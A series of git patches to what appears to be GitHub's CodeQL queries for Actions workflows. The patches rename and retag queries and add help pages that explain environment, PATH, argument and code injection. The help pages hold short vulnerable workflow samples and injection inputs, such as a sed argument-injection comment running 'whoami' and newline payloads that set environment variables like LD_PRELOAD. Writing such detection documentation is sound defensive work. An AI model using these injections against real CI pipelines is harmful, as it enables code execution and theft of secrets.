@@ edges | .github/workflows/dependabot2.yml:47:9:52:6 | Run Step | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | | .github/workflows/dependabot2.yml:52:9:58:6 | Run Step | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | | .github/workflows/dependabot2.yml:58:9:61:6 | Run Step | .github/workflows/dependabot2.yml:61:9:68:19 | Run Step | +| .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:20:9:25:6 | Uses Step | +| .github/workflows/dependabot3.yml:20:9:25:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:48:9:52:57 | Run Step | | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | | .github/workflows/gitcheckout.yml:18:11:21:8 | Uses Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | @@ -153,6 +156,7 @@ edges | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | From 8ebe76668cd59844966e20cb7626f763545c4ee8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 7 Aug 2024 17:24:59 +0200 Subject: [PATCH 0465/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 0d53b48ef11..d9889fb0869 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.35 +version: 0.1.36 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ade19bd63ee..9b4795a0d8a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.35 +version: 0.1.36 groups: [actions, queries] suites: codeql-suites extractor: javascript From f4f18f38ccb4cf89865dce475526bf143a37e800 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:04:32 +0200 Subject: [PATCH 0466/1267] Move Argument injection queries to its own CWE --- .../{CWE-094 => CWE-088}/ArgumentInjectionCritical.ql | 4 +--- .../Security/{CWE-094 => CWE-088}/ArgumentInjectionMedium.ql | 4 +--- .../{CWE-094 => CWE-088}/.github/workflows/arg_injection.yml | 0 .../{CWE-094 => CWE-088}/ArgumentInjectionCritical.expected | 0 .../Security/CWE-088/ArgumentInjectionCritical.qlref | 1 + .../{CWE-094 => CWE-088}/ArgumentInjectionMedium.expected | 0 .../Security/CWE-088/ArgumentInjectionMedium.qlref | 1 + .../Security/CWE-094/ArgumentInjectionCritical.qlref | 1 - .../Security/CWE-094/ArgumentInjectionMedium.qlref | 1 - 9 files changed, 4 insertions(+), 8 deletions(-) rename ql/src/Security/{CWE-094 => CWE-088}/ArgumentInjectionCritical.ql (89%) rename ql/src/Security/{CWE-094 => CWE-088}/ArgumentInjectionMedium.ql (89%) rename ql/test/query-tests/Security/{CWE-094 => CWE-088}/.github/workflows/arg_injection.yml (100%) rename ql/test/query-tests/Security/{CWE-094 => CWE-088}/ArgumentInjectionCritical.expected (100%) create mode 100644 ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref rename ql/test/query-tests/Security/{CWE-094 => CWE-088}/ArgumentInjectionMedium.expected (100%) create mode 100644 ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref delete mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref diff --git a/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql similarity index 89% rename from ql/src/Security/CWE-094/ArgumentInjectionCritical.ql rename to ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index e56f613fac4..affa372f14e 100644 --- a/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -8,9 +8,7 @@ * @id actions/argument-injection/critical * @tags actions * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 + * external/cwe/cwe-088 */ import actions diff --git a/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql similarity index 89% rename from ql/src/Security/CWE-094/ArgumentInjectionMedium.ql rename to ql/src/Security/CWE-088/ArgumentInjectionMedium.ql index 66c51ae3673..fa5b750fd89 100644 --- a/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.ql @@ -8,9 +8,7 @@ * @id actions/argument-injection/medium * @tags actions * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 + * external/cwe/cwe-088 */ import actions diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml rename to ql/test/query-tests/Security/CWE-088/.github/workflows/arg_injection.yml diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected rename to ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.expected diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref new file mode 100644 index 00000000000..e36c9c6f3e8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-088/ArgumentInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected rename to ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref new file mode 100644 index 00000000000..afc26233870 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-088/ArgumentInjectionMedium.ql diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref deleted file mode 100644 index 6b3e2fd9f62..00000000000 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/ArgumentInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref deleted file mode 100644 index b9c4ae95e43..00000000000 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-094/ArgumentInjectionMedium.ql From 9977f25f0f4ac6d990aca4eb3423a94e48bfe244 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:05:17 +0200 Subject: [PATCH 0467/1267] Move some queries to experimental --- ql/src/Security/CWE-078/CommandInjectionCritical.ql | 1 + ql/src/Security/CWE-078/CommandInjectionMedium.ql | 1 + ql/src/Security/CWE-200/SecretExfiltration.ql | 1 + ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql | 3 +-- ql/src/Security/CWE-918/RequestForgery.ql | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index 68942478284..f5a4aed3eca 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -9,6 +9,7 @@ * @id actions/command-injection/critical * @tags actions * security + * experimental * external/cwe/cwe-078 */ diff --git a/ql/src/Security/CWE-078/CommandInjectionMedium.ql b/ql/src/Security/CWE-078/CommandInjectionMedium.ql index 5feacedc40b..8e7d72dded9 100644 --- a/ql/src/Security/CWE-078/CommandInjectionMedium.ql +++ b/ql/src/Security/CWE-078/CommandInjectionMedium.ql @@ -9,6 +9,7 @@ * @id actions/command-injection/medium * @tags actions * security + * experimental * external/cwe/cwe-078 */ diff --git a/ql/src/Security/CWE-200/SecretExfiltration.ql b/ql/src/Security/CWE-200/SecretExfiltration.ql index a6d1c18b733..2e583a98989 100644 --- a/ql/src/Security/CWE-200/SecretExfiltration.ql +++ b/ql/src/Security/CWE-200/SecretExfiltration.ql @@ -8,6 +8,7 @@ * @id actions/secret-exfiltration * @tags actions * security + * experimental * external/cwe/cwe-200 */ diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index b32fe406877..9610302d1c2 100644 --- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -8,9 +8,8 @@ * @id actions/pr-on-self-hosted-runner * @tags actions * security - * external/cwe/cwe-284 - * testing * experimental + * external/cwe/cwe-284 */ import codeql.actions.security.SelfHostedQuery diff --git a/ql/src/Security/CWE-918/RequestForgery.ql b/ql/src/Security/CWE-918/RequestForgery.ql index 3700201c315..9721d666bd4 100644 --- a/ql/src/Security/CWE-918/RequestForgery.ql +++ b/ql/src/Security/CWE-918/RequestForgery.ql @@ -8,6 +8,7 @@ * @id actions/request-forgery * @tags actions * security + * experimental * external/cwe/cwe-918 */ From d8df3ff6b3ca33598e2968b015cd318587fa46b9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:05:41 +0200 Subject: [PATCH 0468/1267] Use ControlCheck.dominates in the ImproperAccessControl query --- ql/src/Security/CWE-285/ImproperAccessControl.ql | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 3fc94d1aa22..2c7882604b2 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -20,11 +20,6 @@ where job.getATriggerEvent() = event and event.getName() = "pull_request_target" and event.getAnActivityType() = "synchronize" and - job.getAStep() = checkout and - ( - checkout.getIf() = check - or - checkout.getEnclosingJob().getIf() = check - ) -select checkout, "The checked-out code can be changed after the authorization check o step $@.", - check, check.toString() + check.dominates(checkout) +select checkout, "The checked-out code can be modified after the authorization check $@.", check, + check.toString() From 9411fac4d02de6af4214f4d1f983d99bce815d24 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:06:06 +0200 Subject: [PATCH 0469/1267] New Descriptions --- .../CWE-077/EnvPathInjectionCritical.md | 37 ++++ .../CWE-077/EnvPathInjectionMedium.md | 37 ++++ .../CWE-077/EnvVarInjectionCritical.md | 117 ++++++++++++ .../Security/CWE-077/EnvVarInjectionMedium.md | 117 ++++++++++++ .../CWE-088/ArgumentInjectionCritical.md | 41 +++++ .../CWE-088/ArgumentInjectionMedium.md | 41 +++++ .../Security/CWE-094/CodeInjectionCritical.md | 26 ++- .../Security/CWE-094/CodeInjectionMedium.md | 26 ++- .../CWE-1395/UseOfKnownVulnerableAction.md | 13 ++ .../CWE-275/MissingActionsPermissions.md | 17 +- .../Security/CWE-285/ImproperAccessControl.md | 57 ++++++ .../CWE-312/ExcessiveSecretsExposure.md | 52 ++++++ .../CWE-312/UnmaskedSecretExposure.md | 37 ++++ .../CWE-349/CachePoisoningViaCodeInjection.md | 83 +++++++++ .../CWE-349/CachePoisoningViaDirectCache.md | 101 +++++++++++ .../CachePoisoningViaPoisonableStep.md | 85 +++++++++ .../UntrustedCheckoutTOCTOUCritical.md | 168 ++++++++++++++++++ .../CWE-367/UntrustedCheckoutTOCTOUMedium.md | 168 ++++++++++++++++++ .../CWE-571/ExpressionIsAlwaysTrue.md | 63 +++++++ .../CWE-829/ArtifactPoisoningCritical.md | 72 ++++++++ .../CWE-829/ArtifactPoisoningMedium.md | 72 ++++++++ ql/src/Security/CWE-829/UnpinnedActionsTag.md | 27 +++ .../CWE-829/UntrustedCheckoutCritical.md | 137 ++++++++++++++ .../Security/CWE-829/UntrustedCheckoutHigh.md | 137 ++++++++++++++ .../CWE-829/UntrustedCheckoutMedium.md | 137 ++++++++++++++ 25 files changed, 1860 insertions(+), 8 deletions(-) create mode 100644 ql/src/Security/CWE-077/EnvPathInjectionCritical.md create mode 100644 ql/src/Security/CWE-077/EnvPathInjectionMedium.md create mode 100644 ql/src/Security/CWE-077/EnvVarInjectionCritical.md create mode 100644 ql/src/Security/CWE-077/EnvVarInjectionMedium.md create mode 100644 ql/src/Security/CWE-088/ArgumentInjectionCritical.md create mode 100644 ql/src/Security/CWE-088/ArgumentInjectionMedium.md create mode 100644 ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.md create mode 100644 ql/src/Security/CWE-285/ImproperAccessControl.md create mode 100644 ql/src/Security/CWE-312/ExcessiveSecretsExposure.md create mode 100644 ql/src/Security/CWE-312/UnmaskedSecretExposure.md create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.md create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaDirectCache.md create mode 100644 ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.md create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.md create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUMedium.md create mode 100644 ql/src/Security/CWE-571/ExpressionIsAlwaysTrue.md create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoningCritical.md create mode 100644 ql/src/Security/CWE-829/ArtifactPoisoningMedium.md create mode 100644 ql/src/Security/CWE-829/UnpinnedActionsTag.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutCritical.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutHigh.md create mode 100644 ql/src/Security/CWE-829/UntrustedCheckoutMedium.md diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md new file mode 100644 index 00000000000..1891d41fa39 --- /dev/null +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -0,0 +1,37 @@ +# Environment Path Injection + +## Description + +GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. + +```bash +echo "$HOME/.local/bin" >> $GITHUB_PATH +``` + +If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job. + +## Recommendations + +- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. + +## Examples + +### Incorrect Usage + +Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: + +```yaml +steps: + - name: Set the path + env: + BODY: ${{ github.event.comment.body }} + run: | + PATH=$(echo "$BODY" | grep -oP 'system path: \K\S+') + echo "$PATH" >> "$GITHUB_PATH" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially change the system PATH and get arbitrary command execution in subsequent steps. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md new file mode 100644 index 00000000000..1891d41fa39 --- /dev/null +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md @@ -0,0 +1,37 @@ +# Environment Path Injection + +## Description + +GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. + +```bash +echo "$HOME/.local/bin" >> $GITHUB_PATH +``` + +If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job. + +## Recommendations + +- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data sources (e.g., artifact content) to define the system PATH. + +## Examples + +### Incorrect Usage + +Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: + +```yaml +steps: + - name: Set the path + env: + BODY: ${{ github.event.comment.body }} + run: | + PATH=$(echo "$BODY" | grep -oP 'system path: \K\S+') + echo "$PATH" >> "$GITHUB_PATH" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially change the system PATH and get arbitrary command execution in subsequent steps. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md new file mode 100644 index 00000000000..1d33a014d4b --- /dev/null +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md @@ -0,0 +1,117 @@ +# Environment Variable Injection + +## Description + +GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: + +This file should lines in the `KEY=VALUE` format: + +```bash +steps: + - name: Set the value + id: step_one + run: | + echo "action_state=yellow" >> "$GITHUB_ENV" +``` + +It is also possible to define a multiline variables by using the following format: + +``` +KEY<<{delimiter} +VALUE +VALUE +{delimiter} +``` + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" +``` + +If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. + +## Recommendations + +1. **Do Not Allow Untrusted Data to Influence Environment Variables**: + +- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. +- Validate and sanitize all inputs before using them in environment settings. + +2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: + +- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + +3. **Use Unique Identifiers When Defining Multi Line Environment Variables**: + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" +``` + +## Examples + +### Example of Vulnerability + +Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: + +```yaml +steps: + - name: Set the value + id: step_one + env: + BODY: ${{ github.event.comment.body }} + run: | + REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') + echo "BODY=$REPLACED" >> "$GITHUB_ENV" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: + +``` +FOO +NEW_ENV_VAR=MALICIOUS_VALUE +``` + +Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: + +```bash +- run: | + PR_NUMBER=$(cat pr-number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV +``` + +An attacker could craft a malicious artifact that writes dangerous environment variables: + +```bash + - run: | + echo -e "666\nNEW_ENV_VAR=MALICIOUS_VALUE" > pr-number.txt + - uses: actions/upload-artifact@v4 + with: + name: pr-number + path: ./pr-number.txt +``` + +### Exploitation + +An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) +- [GitHub Actions Exploitation: Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation) diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md new file mode 100644 index 00000000000..1d33a014d4b --- /dev/null +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md @@ -0,0 +1,117 @@ +# Environment Variable Injection + +## Description + +GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: + +This file should lines in the `KEY=VALUE` format: + +```bash +steps: + - name: Set the value + id: step_one + run: | + echo "action_state=yellow" >> "$GITHUB_ENV" +``` + +It is also possible to define a multiline variables by using the following format: + +``` +KEY<<{delimiter} +VALUE +VALUE +{delimiter} +``` + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" +``` + +If an attacker can control the contents of the values assigned to these variables and these are not properly sanitized, they will be able to inject additional variables by injecting new lines or `{delimiters}`. + +## Recommendations + +1. **Do Not Allow Untrusted Data to Influence Environment Variables**: + +- Avoid using untrusted data sources (e.g., artifact content) to define environment variables. +- Validate and sanitize all inputs before using them in environment settings. + +2. **Do Not Allow New Lines When Defining Single Line Environment Variables**: + +- `echo "BODY=$(echo "$BODY" | tr -d '\n')" >> "$GITHUB_ENV"` + +3. **Use Unique Identifiers When Defining Multi Line Environment Variables**: + +```bash +steps: + - name: Set the value in bash + id: step_one + run: | + # Generate a UUID + UUID=$(uuidgen) + { + echo "JSON_RESPONSE<> "$GITHUB_ENV" +``` + +## Examples + +### Example of Vulnerability + +Consider the following basic setup where an environment variable `MYVAR` is set and used in different steps: + +```yaml +steps: + - name: Set the value + id: step_one + env: + BODY: ${{ github.event.comment.body }} + run: | + REPLACED=$(echo "$BODY" | sed 's/FOO/BAR/g') + echo "BODY=$REPLACED" >> "$GITHUB_ENV" +``` + +If an attacker can manipulate the value being set, such as through artifact downloads or user inputs, they can potentially inject new Environment variables. For example, they could write an Issue comment like: + +``` +FOO +NEW_ENV_VAR=MALICIOUS_VALUE +``` + +Likewise, if the attacker controls a file in the Runner's workspace (eg: the workflow checkouts untrusted code or downloads an untrusted artifact), and the contents of that file are assigned to an environment variable such as: + +```bash +- run: | + PR_NUMBER=$(cat pr-number.txt) + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV +``` + +An attacker could craft a malicious artifact that writes dangerous environment variables: + +```bash + - run: | + echo -e "666\nNEW_ENV_VAR=MALICIOUS_VALUE" > pr-number.txt + - uses: actions/upload-artifact@v4 + with: + name: pr-number + path: ./pr-number.txt +``` + +### Exploitation + +An attacker will be able to run arbitrary code by injecting environment variables such as `LD_PRELOAD`, `BASH_ENV`, etc. + +## References + +- [Workflow commands for GitHub Actions](https://docs.github.com/en/actions/writing-workflows/choosing-what-your-workflow-does/workflow-commands-for-github-actions) +- [GitHub Actions Exploitation: Repo Jacking and Environment Manipulation](https://www.synacktiv.com/publications/github-actions-exploitation-repo-jacking-and-environment-manipulation) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.md b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md new file mode 100644 index 00000000000..00dc3bad472 --- /dev/null +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.md @@ -0,0 +1,41 @@ +# Argument Injection in GitHub Actions + +## Description + +Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. + +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. + +## Recommendations + +When possible avoid passing user-controlled data to commands which may spawn new processes using some of their arguments. + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Examples + +### Incorrect Usage + +The following example lets a user inject an arbitrary shell command through argument injection: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.comment.body }} + run: | + cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt +``` + +An attacker may set the body of an Issue comment to `BAR|g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. + +## References + +- [Common Weakness Enumeration: CWE-88](https://cwe.mitre.org/data/definitions/88.html). +- [Argument Injection Explained](https://sonarsource.github.io/argument-injection-vectors/explained/) +- [Argument Injection Vectors](https://sonarsource.github.io/argument-injection-vectors/) +- [GTFOBins](https://gtfobins.github.io/) diff --git a/ql/src/Security/CWE-088/ArgumentInjectionMedium.md b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md new file mode 100644 index 00000000000..00dc3bad472 --- /dev/null +++ b/ql/src/Security/CWE-088/ArgumentInjectionMedium.md @@ -0,0 +1,41 @@ +# Argument Injection in GitHub Actions + +## Description + +Passing user-controlled arguments to certain commands in the context of `Run` steps may lead to arbitrary code execution. + +Argument injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. + +## Recommendations + +When possible avoid passing user-controlled data to commands which may spawn new processes using some of their arguments. + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Examples + +### Incorrect Usage + +The following example lets a user inject an arbitrary shell command through argument injection: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.comment.body }} + run: | + cat file.txt | sed "s/BODY_PLACEHOLDER/$BODY/g" > replaced.txt +``` + +An attacker may set the body of an Issue comment to `BAR|g;1e whoami;#` and the command `whoami` will get executed during the `sed` operation. + +## References + +- [Common Weakness Enumeration: CWE-88](https://cwe.mitre.org/data/definitions/88.html). +- [Argument Injection Explained](https://sonarsource.github.io/argument-injection-vectors/explained/) +- [Argument Injection Vectors](https://sonarsource.github.io/argument-injection-vectors/) +- [GTFOBins](https://gtfobins.github.io/) diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.md b/ql/src/Security/CWE-094/CodeInjectionCritical.md index 9939c88eb19..cc85f68fb0d 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.md +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.md @@ -1,16 +1,20 @@ # Code Injection in GitHub Actions +## Description + Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. -## Recommendation +## Recommendations The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. -## Example +## Examples + +### Incorrect Usage The following example lets a user inject an arbitrary shell command: @@ -40,6 +44,8 @@ jobs: echo '${{ env.BODY }}' ``` +### Correct Usage + The following example uses shell syntax to read the environment variable and will prevent the attack: ```yaml @@ -53,6 +59,22 @@ jobs: echo "$BODY" ``` +The following example uses `process.env` to read environment variables within JavaScript code. + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - uses: uses: actions/github-script@v4 + env: + BODY: ${{ github.event.issue.body }} + with: + script: | + const { BODY } = process.env + ... +``` + ## References - GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted 